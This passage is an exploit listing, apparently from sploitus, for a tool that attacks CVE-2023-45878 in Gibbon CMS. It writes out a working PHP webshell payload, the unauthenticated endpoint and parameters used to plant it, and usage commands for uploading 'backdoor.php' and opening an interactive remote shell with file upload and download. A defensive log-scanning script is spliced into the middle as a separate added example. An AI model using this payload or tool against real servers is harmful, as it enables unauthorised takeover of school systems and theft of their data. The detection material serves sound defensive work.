## https://sploitus.com/exploit?id=143A14ED-AD79-5FF6-9262-9DE5FB55B4BB
# Gibbon CMS (CVE-2023-45878) Exploit
This Python script exploits CVE-2023-45878, an unauthenticated arbitrary file upload vulnerability in Gibbon CMS versions 25.0.1 and before, leading to Remote Code Execution (RCE).
## Vulnerability Description
CVE-2023-45878 exists in the `rubrics_visualise_saveAjax.php` endpoint of Gibbon CMS. This endpoint is vulnerable because it does not require authentication and allows arbitrary file writes.
The vulnerability arises from the following:
* **Unauthenticated Access:** The `modules/Rubrics/rubrics_visualise_saveAjax.php` endpoint is accessible without any authentication.
* **Arbitrary File Write:** The endpoint accepts `img`, `path`, and `gibbonPersonID` POST parameters.
  * The `img` parameter is expected to contain specially formatted data, where the part after a comma is a base64 encoded string.
  * The `path` parameter, if provided, is used as the destination filename for the uploaded file, relative to the Gibbon installation directory.
  * The script decodes the base64 encoded content from the `img` parameter and writes it to a file specified by the `path` parameter.
* **Remote Code Execution:** By crafting a malicious `img` parameter containing base64 encoded PHP code (e.g., `<?php echo "{VERIFY_TAG}"; if(isset($_GET["cmd"])) {echo @shell_exec($_GET["cmd"]);} ?>`) and specifying a `path` that results in a `.php` file accessible via the web server, an attacker can upload a PHP webshell and achieve Remote Code Execution on the vulnerable server.
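From the defender's side, the two request patterns described above (an unauthenticated POST to the rubric save endpoint, then `cmd=` requests to a freshly written PHP file from the same client) are visible in ordinary web server access logs. The following is an added detection example, not part of the exploit script or of Gibbon; the log lines, IP addresses and filenames are constructed, and treating any `cmd` query parameter on a `.php` path as suspicious is an assumption that the application's own pages do not use that parameter.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Endpoint named in the advisory; matched as a path suffix so any install prefix works.
VULN_ENDPOINT = "/modules/Rubrics/rubrics_visualise_saveAjax.php"

# Constructed sample log: one client hits the save endpoint, then probes a random
# 8-character .php file with cmd=echo (the script's own verification step);
# a second client browses the Rubrics module normally.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "POST /gibbon/modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1" 200 12 "-" "python-requests/2.31"
203.0.113.5 - - [10/May/2024:12:00:02 +0000] "GET /gibbon/k3jd82hs.php?cmd=echo HTTP/1.1" 200 14 "-" "python-requests/2.31"
198.51.100.7 - - [10/May/2024:12:00:05 +0000] "GET /gibbon/index.php?q=/modules/Rubrics/rubrics.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def scan(lines):
    """Return (ip, reason, request target) findings for the two patterns above."""
    findings = []
    save_posters = defaultdict(list)  # ip -> timestamps of POSTs to the save endpoint
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].endswith(VULN_ENDPOINT):
            save_posters[rec["ip"]].append(rec["ts"])
            findings.append((rec["ip"], "POST to unauthenticated rubric save endpoint", rec["target"]))
        elif rec["path"].endswith(".php") and "cmd" in rec["query"]:
            reason = "cmd= query to PHP file"
            if rec["ip"] in save_posters:  # correlate with an earlier file write attempt
                reason += " from IP that previously POSTed to save endpoint"
            findings.append((rec["ip"], reason, rec["target"]))
    return findings


if __name__ == "__main__":
    for ip, reason, target in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip}\t{reason}\t{target}")
```

On a patched instance the POST itself is no longer exploitable, but a successful POST followed by a `.php` path that did not exist before is still the clearest trace of a prior compromise and is worth correlating with file-system timestamps under the Gibbon install directory.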
## Script Functionality
This Python script automates the exploitation of CVE-2023-45878. It performs the following actions:
1. **PHP Webshell Upload:** It crafts a malicious POST request to `modules/Rubrics/rubrics_visualise_saveAjax.php` to upload a PHP webshell. The webshell payload is `<?php echo "{VERIFY_TAG}"; if(isset($_GET["cmd"])) {echo @shell_exec($_GET["cmd"]);} ?>`, where `{VERIFY_TAG}` is a customizable tag. The payload is base64 encoded and sent within the `img` parameter.
2. **Shell Verification:** It can verify if the uploaded shell is accessible and functional by sending a GET request with a simple command (e.g., `cmd=echo`) and checking for the `VERIFY_TAG` in the response. It also performs a pre-check for an existing shell if options like `--verify` or `--interactive` are used.
3. **Interactive Shell Mode:** If the shell is uploaded and verified (or found during a pre-check), the script can enter an interactive mode. This mode features:
   * Detection of the remote operating system (Windows/Linux) to tailor commands.
   * A dynamic prompt displaying the current user, hostname, and remote working directory (e.g., `user@host:cwd$`).
   * Built-in handling for the `cd` command to change the remote working directory.
   * Special client-side commands:
     * `!help`: Displays help for interactive commands.
     * `!upload <local_path> [remote_path]`: Uploads a local file to the target server through the webshell.
     * `!download <remote_path> [local_path]`: Downloads a file from the target server.
     * `!lcd <path>`: Changes the local current working directory.
     * `!ldir [path]`: Lists files and directories in the local current working directory or specified path.
   * Uses the `prompt_toolkit` library if available for an enhanced command-line experience (history, better editing), otherwise falls back to Python's built-in `input()`.
4. **File Operations:** The interactive `!upload` command reuses the vulnerable endpoint to write arbitrary files, while `!download` uses system commands executed via the webshell (like `base64` or PowerShell's `[Convert]::ToBase64String`) to retrieve file content.
## Usage
```bash
python3 exploit.py <target_url> [options]
```
**Arguments:**
* `target_url`: The base URL of the target Gibbon CMS instance. The script will prepend `http://` if no scheme is provided and ensure a trailing slash (e.g., `http://example.com/gibbon` or `example.com/gibbon`).
**Options:**
* `-s <shell_path>`, `--shell-path <shell_path>`:
  Specify the desired path and filename for the uploaded shell (e.g., `shell.php`, `uploads/shell.php`).
  If omitted, a random 8-character filename with a `.php` extension will be generated in the Gibbon base directory.
  Warning: Ensure the specified path is writable by the web server and accessible via the web.
* `-v`, `--verify`:
  After attempting to upload the shell, verify if it is working. This option also triggers a pre-check to see if a shell with the specified name and tag already exists; if so, upload is skipped.
* `-i`, `--interactive`:
  Enter interactive shell mode. If the shell is not already present (verified by a pre-check), it will be uploaded and verified first.
* `-t <tag>`, `--tag <tag>`:
  Specify a custom static tag used in the webshell payload for verification purposes. (Default: `ExploitGibbon`).
* `--timeout <timeout>`:
  Set the HTTP request timeout in seconds. (Default: 20).
**Examples:**
* Basic exploit with random shell name in the main Gibbon directory and default tag:
```bash
python3 exploit.py http://target.com/gibbon/
```
* Exploit, specify shell filename `my_shell.php` in the main Gibbon directory and default tag:
```bash
python3 exploit.py http://target.com/gibbon/ -s my_shell.php
```
* Exploit, upload shell filename `backdoor.php` to `uploads/`, verify it, and use a custom tag:
```bash
python3 exploit.py http://target.com/gibbon/ -s uploads/backdoor.php -v -t MySecretTag123
```
* Exploit, upload shell, and enter interactive mode with default tag and a 30-second timeout:
```bash
python3 exploit.py http://target.com/gibbon/ -s shell.php -i --timeout 30
```
* Enter interactive mode with an existing shell (script will pre-check its existence):
```bash
python3 exploit.py http://target.com/gibbon/ -s shell.php -t ExploitGibbon -i
```
* Only verify if a shell named `existing_shell.php` with the default tag is active (will attempt upload if not found):
```bash
python3 exploit.py http://target.com/gibbon/ -s existing_shell.php -v
```
## Requirements
* **Python 3.7+** (due to f-strings, type hinting, `dataclasses`, `pathlib` usage)
* `requests` library: Install using `pip install requests`
* `rich` library: Install using `pip install rich`
* `prompt_toolkit` library (optional, for enhanced interactive mode): Install using `pip install prompt_toolkit`
## Disclaimer
This script is provided for educational and security testing purposes only. Use it at your own risk and only against systems you have explicit permission to test. The author is not responsible for any misuse or damage caused by this script. Exploiting vulnerabilities without authorization is illegal and unethical.
## References
* [CVE-2023-45878 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-45878)
* [Herolab Security Advisory USD-2023-0025](https://herolab.usd.de/security-advisories/usd-2023-0025)
* [GibbonEdu Core Source (rubrics_visualise_saveAjax.php affected version v25.0.01)](https://github.com/GibbonEdu/core/blob/v25.0.01/modules/Rubrics/rubrics_visualise_saveAjax.php)